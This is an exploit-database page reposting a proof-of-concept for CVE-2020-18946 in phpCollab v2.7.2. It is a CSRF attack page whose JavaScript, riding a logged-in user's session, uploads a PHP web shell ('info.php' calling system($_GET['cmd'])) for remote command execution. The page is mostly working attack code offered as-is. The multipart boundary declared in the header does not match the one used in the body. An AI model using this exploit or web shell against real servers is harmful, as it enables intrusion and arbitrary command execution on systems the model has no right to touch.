Advertisement






phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script

CVE Category Price Severity
CVE-2020-18946 CWE-352 $5000 Critical
Author Risk Exploitation Type Date
Yash Sanghani High Remote 2020-04-27
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020040163

Below is a copy:

phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script
#/
#* phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script
#* Author  : Trung Le
#* Tutorial Video : https://youtu.be/BLFbUJ4n8hY
#* Twitter : @lethanhtrungdbp
#* Facebook : fb.com/c0nc4nh0
#/
<!DOCTYPE html>
<html>
<title>phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script</title>
<body>

<script type="text/javascript">


function upload(){
  var xhr = new XMLHttpRequest();
  xhr.open("POST", "/phpcol/clients/editclient.php?action=add&", true);
  xhr.setRequestHeader("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8");
  xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.8");
  xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=---------------------------2273947705998934173936604226");
  xhr.withCredentials = true;
  var body = "-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="MAX_FILE_SIZE"\r\n" +
"\r\n" +
"100000000\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="owner"\r\n" +
"\r\n" +
"1\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="name"\r\n" +
"\r\n" +
"100\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="address"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="phone"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="url"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="email"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="comments"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="hourly_rate"\r\n" +
"\r\n" +
"0.00\r\n" +
"-----------------------------11872893914229319724059542750\r\n" +
"Content-Disposition: form-data; name="upload"; filename="info.php"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"<HTML><BODY>\r\n" +
"<FORM METHOD="GET" NAME="myform" ACTION="">\r\n" +
"<INPUT TYPE="text" NAME="cmd">\r\n" +
"<INPUT TYPE="submit" VALUE="Send">\r\n" +
"</FORM>\r\n" +
"<pre>\r\n" +
"<?\r\n" +
"if($_GET['cmd']) {\r\n" +
"  system($_GET['cmd']);\r\n" +
"  }\r\n" +
"?>\r\n" +
"</pre>\r\n" +
"</BODY></HTML>\r\n" +
"\r\n" +
"\r\n" +
"\r\n" +
"-----------------------------11872893914229319724059542750--\r\n";
  var aBody = new Uint8Array(body.length);
  for (var i = 0; i < aBody.length; i++)
    aBody[i] = body.charCodeAt(i); 
    xhr.send(new Blob([aBody]));
}

</script>

<h3>phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script</h3>

<form action="#">
  <button type="button" onclick=upload()>phpCollab v2.7.2 - CSRF Arbitrary File Upload RCE PoC Script</button>
</form><br />
<iframe
  style="border:2px;border-style:dashed;color:#d3d3d3"
  srcdoc="command output frame"
  width="700" height="600"
  name="ZSL_iframe">
</iframe>
<br />
<font size="2" color="#d3d3d3">ZSL-2016-5328</font>

</body>
</html>

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.